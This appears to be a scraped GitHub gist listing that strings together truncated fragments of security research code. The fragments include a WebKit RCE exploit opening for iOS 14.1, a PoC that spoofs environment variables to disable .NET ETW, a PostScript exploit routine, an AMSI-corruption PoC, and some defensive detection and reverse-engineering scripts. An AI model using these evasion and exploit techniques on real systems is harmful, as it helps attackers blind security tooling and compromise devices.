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//All credit goes to and the great @tiraniddo
//Snippets copied from
// - Great read!
// - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
function Get-RdpLogonEvent
[Int32] $Last = 10
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
qqvirus /
Created February 25, 2022 07:40 — forked from matterpreter/
Ghidra RPC procedure identification script
//Locate RPC procecures inside of server code
//@author Matt Hand (@matterpreter) based on original work by Sektor7 Labs (@reenz0h)
//@category Functions
import ghidra.program.model.block.*;
import ghidra.program.model.symbol.*;
qqvirus / fuck.js
Created February 14, 2022 06:02 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
let data_view = new DataView(new ArrayBuffer(8));
qqvirus / __declspec关键字详细用法
Created August 2, 2021 07:54 — forked from 0xlitf/__declspec关键字详细用法
用法:__declspec ( extended-decl-modifier )
align (C++)
deprecated (C++)
qqvirus / env_var_spoofing_poc.cpp
Created July 29, 2020 03:46 — forked from xpn/env_var_spoofing_poc.cpp
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
// (
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
% just copy from
/exploit {
/println { (\\n) exch print print } bind executeonly def
/info { ([*] ) print println } bind executeonly def
/success { ([+] ) print println } bind executeonly def
/fail { ([-] ) print println stop } bind executeonly def
/MaxFileSize 16#10000 def
/readfile {
qqvirus /
Created May 17, 2019 01:20 — forked from Jinmo/
loading IDA colors (clr) file given a path to the file
from ctypes import c_ssize_t, c_void_p, c_int, c_void_p, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL
from PyQt5.QtCore import Qt, QTimer, QObject
from PyQt5.QtGui import QResizeEvent, QFocusEvent
from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp
import os
import sys
import idaapi
import idc
qqvirus / CollectDotNetEvents.ps1
Created December 10, 2018 09:52 — forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets
# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass
# logman stop dotNetTrace -ets
# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe
# I got the process ID by running a procmon trace
$TargetProcessId = 8256
qqvirus / CorruptCLRGlobal.ps1
Created December 10, 2018 09:51 — forked from mattifestation/CorruptCLRGlobal.ps1
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
function Subvert-CLRAntiMalware {
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.